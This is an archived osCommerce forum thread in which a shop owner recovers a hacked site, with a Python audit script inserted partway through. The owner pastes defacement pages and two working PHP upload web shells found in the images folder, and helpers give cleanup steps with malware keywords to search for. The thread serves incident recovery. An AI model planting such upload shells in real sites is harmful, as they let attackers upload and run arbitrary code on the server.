This topic is now archived and is closed to further replies.

Racing Club

Error in a homepage

28 posts in this topic

Hello

I have a problem.

From one day to the next my website changed. Before it worked fine. But now I see this message on the homepage and the admin:

homepage: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/index.php on line 35

admin: Parse error: syntax error, unexpected '<' in /home/videoclub/public_html/admin/index.php on line 26

----------------------------------------------

Line 35: <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

Line 26: <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

Please help.

Thanks

I use version v2.2RC2a of osCommerce


Ariel,

Check your website for hacker activity. Hackers usually try to insert code at the top of the index.php files. Perhaps you can post the first 30 lines so we can see it.

Chris


Thanks for replying

 

index.php of homepage:

 

<?php
/*
  $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/

  require('includes/application_top.php');

// the following cPath references come from application_top.php
  $category_depth = 'top';
  if (isset($cPath) && tep_not_null($cPath)) {
    $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
    $cateqories_products = tep_db_fetch_array($categories_products_query);
    if ($cateqories_products['total'] > 0) {
      $category_depth = 'products'; // display products
    } else {
      $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
      $category_parent = tep_db_fetch_array($category_parent_query);
      if ($category_parent['total'] > 0) {
        $category_depth = 'nested'; // navigate through the categories
      } else {
        $category_depth = 'products'; // category has no products, but display the 'no products' message
      }
    }
  }

  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>

 

index.php of admin:

 

<?php
/*
  $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2007 osCommerce

  Released under the GNU General Public License
*/

  require('includes/application_top.php');

  $languages = tep_get_languages();
  $languages_array = array();
  $languages_selected = DEFAULT_LANGUAGE;
  for ($i = 0, $n = sizeof($languages); $i < $n; $i++) {
    $languages_array[] = array('id' => $languages[$i]['code'],
                               'text' => $languages[$i]['name']);
    if ($languages[$i]['directory'] == $language) {
      $languages_selected = $languages[$i]['code'];
    }
  }

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>


Ariel,

Are you sure you didn't make recent changes to accommodate additional language support?

In the index.php, this:

  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS;>
<head>

Should be this:

  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>
<head>

NOTE the ?> BEFORE the doctype line? It is also missing in your /admin/index.php and the language code

  $languages = tep_get_languages();
  $languages_array = array();
  $languages_selected = DEFAULT_LANGUAGE;
  for ($i = 0, $n = sizeof($languages); $i < $n; $i++) {
    $languages_array[] = array('id' => $languages[$i]['code'],
                               'text' => $languages[$i]['name']);
    if ($languages[$i]['directory'] == $language) {
      $languages_selected = $languages[$i]['code'];
    }
  }

is not standard in the default download.

Chris


I didn't make any changes recently and I didn't touch anything.

I tried what you said and it didn't work.

Thanks


Ariel,

 

This is the first 37 lines from a default index.php file. Try it. Remember to back up before making any changes.

 

<?php
/*
  $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/

  require('includes/application_top.php');

// the following cPath references come from application_top.php
  $category_depth = 'top';
  if (isset($cPath) && tep_not_null($cPath)) {
    $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
    $cateqories_products = tep_db_fetch_array($categories_products_query);
    if ($cateqories_products['total'] > 0) {
      $category_depth = 'products'; // display products
    } else {
      $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
      $category_parent = tep_db_fetch_array($category_parent_query);
      if ($category_parent['total'] > 0) {
        $category_depth = 'nested'; // navigate through the categories
      } else {
        $category_depth = 'products'; // category has no products, but display the 'no products' message
      }
    }
  }

  require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);
?>
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html <?php echo HTML_PARAMS; ?>>
<head>

 

 

Chris


DunWeb,

 

I have a backup of my website, but I wanted to see if someone had hacked my website


It is hard to say if the site has been compromised based on the little information you have given and without seeing the URL. However, if you did not make the changes to the index.php and /admin/index.php then there has been some unauthorized activity.

 

 

 

Chris


Url:

www.videoclublasflores.com.ar

 

 

Thanks for all


You have hack files all over in the images folder.

:o

 

Visit the link below:

 

How to Secure Your Site

 

Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable.


Recently I started to see the images folder and I found this (as you are saying):

 

ina.htm: HACKED BY <h4> <center> kaMtiEz </h4> </center> <center> <h4> <br> INDONESIANCODER TEAM @ 2010 </h4> </center>

indonesia.htm: <html><head>
<title>Hacker Indonesia</title><style type="text/css">
html, body {
  color: white;
  background-color: #000080;
}

a {
  background-color: transparent;
  color: #ffffff;
}

#p404 {
  position: absolute;
  top: 20%;
  left: 0px;
  width: 100%;
  height: 1px;
  overflow: visible;
  visibility: visible;
  display: block;
}

#content {
  margin-left: -320px;
  position: absolute;
  top: -100px;
  left: 50%;
  width: 640px;
  height: 200px;
  visibility: visible;
}

#errormessage {
  font: 50px garamond;
  line-height: 200%;
  text-align: center;
}

#title, #footer {
  text-align: center;
}

#title span {
  background-color: #c0c0c0;
  color: #000080;
}
</style><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"></head><body>
<div id="p404">
<div id="content">
<div id="errormessage">
<p>Hacked by Hmei7</p>
</p>
</div>
</div>
</div>
</body></html>

 

kacuk.php: ==kacuk

 

<?php echo '<br><br>'.php_uname().'<br>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'File Uploaded!<br><br>'; } else { echo 'File Upload, Failed!<br><br>'; } } ?>

 

==

 

x.htm: <b><font size="5">by iskorpitx</font></b>

 

 

(I'm not sure)

put.php: <?php
echo '<b>The KabuS<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }
else { echo '<b>Upload Fail !!!</b><br><br>'; }
}
?>

 

----------------------------------

 

 

I'll keep the advice you gave me on "Securing the ADMIN".

But can I get my website as it was before?

What should I do?


Ariel,

 

Follow these steps to clean and secure your website:

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hacker's code.

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code. Look for keywords such as 'base64', 'eval', 'decode'.

3) Delete the files on your hosting account before uploading the clean files.

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

10) [Removed].

 

 

 

Chris


I deleted these files from the images folder:

ina.htm
indonesia.htm
kacuk.php
x.htm
put.php

In point 2 where you asked me to find these keywords:
eval base64 decode

Those words were found in a few files called:
googleff7fe2850f15ebd7.php
googlebc44d7671aae3b3e.php
google7a14fb0c01e4e5d1.php

What should I do?


Those are all hack files.

 

It's not normal on 99.99% (or more) installs to have ANY php files in the images folder.

 

Unless you purposely put a php file in the images folder and you know exactly what it does I'd remove any and all php files from the images folder.
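The checks from this thread's cleanup advice (the step 2 keywords, the step 6 permission ceilings, and the rule that the images folder should hold no PHP files) written as one audit script. This is an added example, not code from any poster or from osCommerce; the function names, the extra file extensions and the sample tree are assumptions.

```python
import os
import re
import stat
import tempfile

# Keywords from step 2; a hit means "review this file", not "this file is malicious".
KEYWORDS = re.compile(rb"base64|eval|decode", re.IGNORECASE)
MAX_DIR, MAX_FILE, MAX_CONFIG = 0o755, 0o644, 0o444  # ceilings from step 6
PHP_EXT = (".php", ".phtml")  # .phtml is an assumption; the thread names only .php
TEXT_EXT = PHP_EXT + (".htm", ".html", ".js")  # file types searched (assumption)

def exceeds(mode, ceiling):  # True if mode grants any permission bit the ceiling does not
    return bool(stat.S_IMODE(mode) & ~ceiling)

def audit(root, upload_dirs=("images",)):
    """Return sorted (finding, relative_path) pairs for a site tree."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        if exceeds(os.stat(dirpath).st_mode, MAX_DIR):
            findings.append(("dir-perms", rel_dir))
        in_upload = rel_dir.split(os.sep)[0] in upload_dirs
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.normpath(os.path.join(rel_dir, name))
            mode = os.lstat(path).st_mode
            if not stat.S_ISREG(mode):
                continue  # skip symlinks and special files
            ceiling = MAX_CONFIG if name == "configure.php" else MAX_FILE
            if exceeds(mode, ceiling):
                findings.append(("file-perms", rel))
            if in_upload and name.lower().endswith(PHP_EXT):
                findings.append(("php-in-images", rel))  # scripts do not belong here
            elif name.lower().endswith(TEXT_EXT):
                with open(path, "rb") as fh:
                    hits = {m.lower().decode() for m in KEYWORDS.findall(fh.read())}
                if hits:
                    findings.append(("keyword:" + ",".join(sorted(hits)), rel))
    return sorted(findings)

def build_sample(root):
    samples = {  # constructed sample tree, not the poster's files
        "index.php": (b"<?php require('includes/application_top.php'); ?>", 0o644),
        "footer.php": (b"<?php eval(base64_decode($x)); ?>", 0o644),
        "includes/configure.php": (b"<?php define('DB_SERVER', 'localhost'); ?>", 0o644),
        "images/put.php": (b"<?php /* uploader */ ?>", 0o644),
    }
    for rel, (data, mode) in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        os.chmod(path, mode)
    os.chmod(os.path.join(root, "includes"), 0o755)
    os.chmod(os.path.join(root, "images"), 0o777)  # world-writable: should be flagged

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(*audit(tmp), sep="\n")
```

Keyword hits are a review list, since legitimate code can contain the same words; the permission checks are only meaningful when run on the hosting account, because a copy downloaded over FTP does not carry the server's file modes.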


Jan,

 

I see you edited #13 post. Please explain where in the forum policies it says I can not invite other members to PM me for additional help? I have read the forum policies AGAIN, and could not find anything to suggest that I have broken any rules.

 

 

 

For the record, here is #10 on the list again:

 

10) If you feel you can not perform any of the above steps, PM me for help, because if you miss any of these steps your site may remain accessible to the hacker.

 

 

I welcome your response here in the forum, so everyone can see it.

 

 

 

Chris


I deleted these files and tomorrow I will download version 2.2 for correction of the two index.php

 

Thanks

 

I hope it works


At the footer of the index.php I found this:

 

[Obfuscated script removed]

 

I already removed it and now I'm adding this:

?>

because it is missing several lines.

 

I'll report how I progress.

 

Thanks!

 

I was slow to respond because I spent the whole afternoon removing a virus from my computer


I am done!

Now when I go to my website or the admin, the page goes blank.

While it is loading I see other addresses at the bottom of Internet Explorer

 

Thanks!


Ariel,

 

If you are seeing other URLs in the progress bar on the footer of your browser, this means you have not cleaned the site entirely. If your Admin page is blank, then there is a code error, possibly whitespace before or after the opening or closing PHP tags.

 

 

 

 

Chris


Chris,

 

Look at the footer of my browser:

 

16lmsz9.jpg

 

 

vdo4k9.jpg

 

 

2m5zb53.jpg

 

What should I do?


That only happens when I open my website with Internet Explorer; with Mozilla Firefox it does not happen.

Could someone please go to my website and see if they get the same?

 

Thanks


Ariel,

 

I am not seeing that using IE 8 or FF 3.6. I suggest you clear your temp files and cookies and reload your browser again.

 

 

 

 

 

Chris


Ariel,

 

I am not seeing that using IE 8 or FF 3.6. I suggest you clear your temp files and cookies and reload your browser again.

 

 

Chris

 

What do you see?

 

Because I deleted temp files and cookies and I keep seeing the same thing

 

Thanks!
